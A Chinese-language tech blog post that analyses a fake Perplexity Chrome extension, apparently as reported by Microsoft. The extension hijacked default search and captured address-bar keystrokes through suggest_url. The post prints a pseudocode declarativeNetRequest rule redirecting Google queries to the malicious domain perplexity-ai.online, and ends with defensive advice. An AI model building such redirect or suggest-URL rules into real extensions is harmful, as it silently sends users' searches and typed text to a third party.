
最近 AI 圈火得一塌糊涂,大伙肯定没少装各种 AI 助手、搜索增强插件吧?但是安装的时候千万得留个心眼!
最近,微软的 Defender 安全研究团队整出了一个大新闻:他们顺藤摸瓜,扒出了一款伪装成高端 AI 搜索引擎 Perplexity 的恶意 Chrome 插件。这玩意儿不仅悄悄篡改用户的默认搜索引擎,最特么绝的是,它连你在浏览器地址栏里每敲下一个字符都不放过,直接在后台实时同步给黑客的服务器!
目前,谷歌在收到微软的负责任披露(Responsible Disclosure)后,已经连夜把这玩意儿从 Chrome 应用商店下架了。但作为天天跟代码打交道的 IT 人,咱们不能光看个热闹,今天我就带大家深入到大厂安全团队的视角,硬核拆解一下这个恶意插件的底层技术路径、实现原理以及黑客的“骚操作”。
一、 完美的“伪装艺术”与流量劫持路径
这款恶意插件在商店里的名字叫 Search for perplexity ai(恶意扩展 ID:flkebkiofojicogddingbdmcmkpbplcd)。为了让受害者不起疑心,黑客甚至斥巨资注册了一个李鬼域名:perplexity-ai[.]online,用来冒充正牌的 perplexity.ai。
整个流量劫持和数据窃取的复现路径极其丝滑,主要分为三步:
- 李代桃僵:
一旦用户不小心安装成功,该插件会立刻利用 Chrome 的配置权限,将自己强制设置为浏览器的默认搜索引擎。 - 中间人卡点:
当你在地址栏里发起搜索时,查询请求并不会直接去谷歌或 Bing,而是首先被抛给黑客控制的服务器 perplexity-ai[.]online。在这里,服务器会静默记录下你的搜索关键词,同时顺手牵羊剥走你的浏览器 Headers(请求头)、IP 地址和 User Agent(用户代理)。 - 无缝重定向:
在服务器后台存完你的隐私后,它会触发一条重定向规则,把请求再弹回到真正的搜索引擎(比如正版 Perplexity、Google 或 Bing)。
由于最后呈现的搜索结果页面完全正常,普通用户根本察觉不到自己在“第一站”就已经被扒得精光。微软安全团队证实,这波操作的目标非常纯粹,就是为了拦截搜索、疯狂洗数据。
二、 核心技术难点:如何做到“未敲回车,已知所想”?
如果只是等用户敲回车发送搜索请求后再劫持,那这个黑客技术只能算及格。这款插件最让安全人员警惕的,是它对浏览器地址栏实时输入的监控。
大家平时在 Chrome 地址栏打字的时候,浏览器下方会自动弹出联想词,对吧?这个功能的底层是靠浏览器向一个特定的服务 URL 发送实时请求实现的。而这个恶意插件,直接把浏览器的联想词配置项 suggest_url 指向了自己的恶意域名!
💡 技术原理解析:
这意味着什么?你根本不需要按下 Enter 键!当你打算搜一些敏感代码或者公司内部机密,刚在地址栏里敲下第一个字母开始,每一个字符的离散输入都会伴随着实时联想请求,源源不断地发送到黑客的服务器上。这种“全包围式”的监听,几乎等同于一个运行在浏览器地址栏里的网络键盘记录器。
三、 深入 Chrome 权限底层:`declarativeNetRequest` 的合法外衣
看到这儿,搞开发的朋友可能会问:Chrome 现在的 Manifest V3 机制管得这么严,这种流氓行为是怎么绕过审查的?
这就不得不提到黑客对 Chrome 开放能力的“极致压榨”了。Chrome 允许正规插件重写搜索引擎配置,这本身是一个合法特性。然而,该插件在 manifest.json 中声明申请了 Chrome 的 declarativeNetRequest 权限族。
// 恶意插件在底层网络规则中的操作逻辑伪代码{ "id": "hijack_search_rule", "priority": 1, "action": { "type": "redirect", "redirect": { "regexSubstitution": "https://perplexity-ai.online/search?q=\\1" } }, "condition": { "regexFilter": "^https://www.google.com/search\\?q=(.*)", "resourceTypes": ["main_frame"] }}通过 declarativeNetRequest,插件可以向浏览器内核注册声明式的网络请求修改规则(比如重写、拦截、重定向),根本不需要在前端页面频繁执行容易被拦截的 JavaScript 代码。黑客将核心的记录和过滤逻辑全部丢在服务端执行。微软指出,这种专门编写服务端代码来消化、记录重定向流量的做法,直接锤死了其“蓄意窃密”的犯罪事实,绝不是什么普通的重定向技术副作用。
四、 隐藏的伏笔:未启用的规则与 WebAssembly 预留
微软在逆向分析该插件的代码时,还发现了更细思极恐的细节:
- 可动态激活的劫持引擎:
插件内部其实已经写好了针对 Google 和 Bing 的重定向规则,只是暂时处于“禁用(Disabled)”状态。这意味着黑客可以随时通过云端指令,一键把劫持范围扩大到全球前两大搜索引擎。 - 预留 WebAssembly (Wasm) 后门:
代码里竟然留有加载 WebAssembly 模块的空接口。一个普普通通的搜索重定向工具,根本没有任何高密度计算需求,为什么要用 Wasm?唯一的合理解释就是:为了后续能够绕过各大安全厂商的静态代码审计,动态下载并执行高度混淆的恶意二进制 Payload。
五、 总结与防御:天下苦“AI 换皮黑产”久矣
老实说,这并不是个例。根据微软的全球安全情报,近期市场上涌现出了海量大打“AI 牌”的恶意插件。有的直接劫持 ChatGPT、DeepSeek 的对话上下文,有的像今天这款一样直接抄了底层的搜索路径。据统计,这波“AI 劫持潮”已经悄然席卷了超过 900,000 次安装,波及超过 20,000 个企业网络。
这次的性质更恶劣,它利用的是 Chrome 自身极其信任的扩展机制,降维打击了用户的隐私防线。
🛠 面对这种防不胜防的暗箭,咱们 IT 人该怎么自保和守护团队?
- 自查自纠:
赶紧检查一下浏览器扩展列表,如果装过叫 Search for perplexity ai的立马卸载!同时打开 Chrome 设置 -> 搜索引擎,确认默认引擎没被悄悄改掉。 - 企业级防御:
强烈建议在公司域控或终端安全策略中,强制实施浏览器扩展白名单机制(Allowlist Only),坚决不允许员工盲推来路不明的 Chrome 插件。 - 监控异常特征:
在网络边界侧,重点监控终端是否存在向未知或高仿域名发送频繁微小请求的流量特征,安装前务必核对插件发布者和官网域名。
搞 AI 工具可以,但打着 AI 的幌子做贼,纯属恶心人。大家给自己的浏览器做个大扫除吧!欢迎在评论区聊聊,你为了提高效率都装过哪些涉嫌“越权”的插件?咱们评论区见!
夜雨聆风